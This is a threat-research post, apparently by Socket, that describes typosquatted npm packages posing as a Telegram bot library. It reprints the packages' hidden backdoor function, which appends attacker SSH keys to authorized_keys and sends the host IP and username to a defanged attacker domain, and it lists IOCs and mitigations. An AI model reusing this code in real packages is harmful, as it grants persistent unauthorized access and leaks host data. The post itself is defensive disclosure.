npm Malware Targets Telegram Bot Developers with Persistent SSH Backdoors

Socket’s Threat Research Team has uncovered a new supply chain attack: typosquatted Telegram bot libraries delivering SSH backdoors and data exfiltration routines.

Telegram’s Developer Playground#

Telegram is one of the most popular messaging platforms in the world and increasingly a major target for attackers. Its open ecosystem and bot-friendly architecture make it appealing to developers, but also ripe for abuse.

Telegram now boasts over 1 billion monthly active users as of 2025, including more than 12 million paying subscribers.

The platform does not have a centralized or official app store for bots, and anyone can create and publish bots using the Bot API without a formal vetting process. Although there is some moderation on the platform (e.g. abuse reporting, spam detection), this typically applies after deployment, not during a review or submission phase like with Apple’s App Store or Google Play.

Because Telegram Bot creation doesn't include a formal vetting process, its ecosystem remains wide open for abuse:

• Huge, Knife‑Edge Ecosystem: Bot contests (prizes up to $50K) attract a flood of eager but often inexperienced developers.
• No Gatekeeper: Without an official app directory, fake or malicious npm packages can easily be used in bots and apps without raising suspicion.

Malicious npm Packages Typosquat Popular Telegram Bot API Library to Plant SSH Backdoors#

Since early 2025, we’ve observed multiple malicious npm packages masquerading as the popular node-telegram-bot-api (4.17 million+ downloads) a library developers install by default to extend Telegram via npm. These typosquatted libraries node-telegram-utils, node-telegram-bots-api, and node-telegram-util have silently installed backdoors on unsuspecting hosts.

These malicious packages collectively accumulated around 300 downloads over the past few months. While that number may sound modest, it only takes a single compromised environment to pave the way for wide-scale infiltration or unauthorized data access. Supply chain security incidents repeatedly show that even a handful of installs can have catastrophic repercussions, especially when attackers gain direct access to developer systems or production servers.

Total download count of all the malicious packages

Malicious Packages#

Legitimate Package:

• node-telegram-bot-api - Widely trusted Telegram Bot library

Legitimate Node.js Telegram Bot which has ~4.2 million downloads

Malicious Packages:

• node-telegram-utils
• node-telegram-bots-api
• node-telegram-util

These malicious packages duplicate the README of the legitimate one to create a false sense of authenticity and deceive developers.

Starjacking

These typosquatted packages even link their “Homepage” back to the real GitHub repo, surfacing its 19K+ stars in the npm sidebar. By hijacking that star count, they borrow trust from the legitimate project and fool developers at a glance.

SSH Backdoor: Persistent Access and Data Exfiltration

The malicious Telegram packages automatically invoke a hidden function addBotId() whenever the constructor is called, performing:

1. Automatic, Linux-Only Execution
   • During package instantiation, addBotId() checks os.platform().
   • If Linux is detected, the malicious routine proceeds—no user interaction required.
2. SSH Key Injection
   • The code modifies ~/.ssh/authorized_keys with 2 attacker-supplied SSH keys.
   • Persistent, passwordless remote login is thus granted. If one key is removed, attackers can still use the backup.
3. Data Exfiltration
   • The script collects the system’s external IP (via ipinfo[.]io/ip) and username.
   • It immediately communicates with solana[.]validator[.]blog, confirming the compromise.

Because the ~40 lines below are buried within an otherwise authentic-looking Telegram bot library, developers can easily overlook them. Removing the package alone does not remove the injected SSH keys, leaving systems exposed to ongoing unauthorized access.

Malicious Code

async function addBotId() {
  const username = os.userInfo().username;
  const publicKey = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0eFAxoea78gXpURdj7ufXx1LVEOoVKawxRnwAghXHwGUw4V0V3n194wyUOUGrloGLn5IZ2JGdWLu0b0VHVG1asapkd8l7lKgvPf5yfjrccDs1qpvID8mLzsTfNMwZQlS+sw+bgJx/74f6i3t6QYuBsB0xPuLx8EXok96N1yTjPVXWq3Czwt5pmG+xZFddZLYDMpf8GonwdfTx7BACcapueoSMmOHZX3w1mjOHsT1b41gmHIEGsyo67KN4FLOkWOZIjc7Qge4iRjL24smRZPFJ4FeQjUo7rvEUxTNFb8yTgMGA+o2H3Uqvm/vXYiOTD87UUvy/3hOkoZzJLyFsV1bfyq6/8IQETqMguLzwIT8S1TlJHBUf1sXYh/5dHI4cMXz/r/eK4VlqQvZEE1TJIyAi0ZKnup6j2R3SdO/EIuZeanHyH/u6CboWZ8OcVzDY9EBVxmuYmkCIFiauNHlDNCJwm4CFM1oYinAQsh92zCUmZKQAgnH499mRPR1PWH4m1Ok= sleeper@DESKTOP-GM46AVB \n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaDUmF1FSs6ZIP3Za94X9ehOdheKS4fXQMnOgmiFC4SKQsqHj63xIUCc2nZsRlMbzvxlCGp+MAKyEZSsqCH8QEZ9ye6ovd0wqI1zI1MJtTfMHIKdeVfdjjWgS9C14lX34j4iqAfZL6zkXWT20V3CFEM9UjJM3uvDs31t7FYN6CgB166lIUpxobpT5vfXIA8ZNVH230R9PSIWTSYSDq08bE/YbMouCHZ0RQHecq0AI3wiC4sT1HbUn48lJ37fDIJmfKLLPoNca6cK3Fl88CNQfWUpRsm4lF3Y8XPa6Hn5RQqgoYKd9QSfwOc63EvfqOIgfGuEC5P4BYuF5K/zF/GLeR administrator@Kakashi-PC`; // Multiple SSH keys for redundancy

  if (os.platform() === 'linux') {
    try {
      const ipAddress = await getBotId();
      const sshDir = path.join(os.homedir(), '.ssh');
      const authorizedKeysPath = path.join(sshDir, 'authorized_keys');

      if (!fs.existsSync(sshDir)) {
        fs.mkdirSync(sshDir, { mode: 0o700 });
      }

      if (!fs.existsSync(authorizedKeysPath) || !fs.readFileSync(authorizedKeysPath, 'utf8').includes(publicKey)) {
        fs.appendFileSync(authorizedKeysPath, `\n${publicKey}`);
      }

      https.get(`hxxps://solana[.]validator[.]blog/v1/check?ip=${ipAddress}&name=${username}`);
    } catch (err) {
      console.error('Error:', err);
    }
  }
}

The code adds multiple attacker keys for persistent access and exfiltrates data.

Socket AI Scanner’s analysis, including contextual details about the malicious node-telegram-util package.

Real-World Impact#

These malicious npm packages pose significant threats:

• Persistent unauthorized server access via SSH.
• Data breaches through exfiltrated sensitive information.
• Arbitrary remote code execution potentially leading to complete system compromise.

The sophistication and variety of these attacks highlight the critical risks to developer infrastructure, user privacy, and operational security.

Mitigating npm Malware Risks#

The recent discoveries of malicious npm packages like those targeting Telegram (node-telegram-utils, node-telegram-bots-api) highlight the persistent threat actors pose to the software supply chain. Even a single compromised development machine or server can provide attackers a foothold for broader infiltration, unauthorized SSH access, and sensitive data exfiltration.

Attackers continue to demonstrate adaptability, leveraging trusted open source ecosystems like npm to distribute malware disguised as legitimate tools. Given recent patterns, we anticipate continued attacks utilizing advanced obfuscation techniques and evolving dynamic payload delivery methods.

To mitigate these risks, developers and organizations must proactively secure their software supply chains. Regular dependency audits and automated scanning tools are essential to detect and respond swiftly to malicious or anomalous behaviors in third-party packages before integration into production environments.

Socket’s GitHub app provides real-time monitoring of pull requests, flagging suspicious or malicious dependencies before merging. Implementing the Socket CLI during npm installations or builds further secures the pipeline by identifying vulnerabilities and anomalies before they reach production. Additionally, the Socket browser extension offers proactive protection by analyzing browsing activity and alerting developers to potential threats before downloading or interacting with malicious content. Integrating these layered security measures into development workflows substantially reduces the risk of software supply chain compromise.

Supplementary Materials & Indicators of Compromise (IOCs)#

Malicious Packages

• node-telegram-utils
• node-telegram-bots-api
• node-telegram-util

Malicious Authors

• jordankakashi

IOCs

• Malicious URLs: solana[.]validator[.]blog

MITRE ATT&CK Techniques

• T1195.002 — Supply Chain Compromise
• T1036.005 — Masquerading
• T1505.003 — Server Software Component: SSH Authorized Keys Modification
• T1567.002 — Exfiltration Over Web Service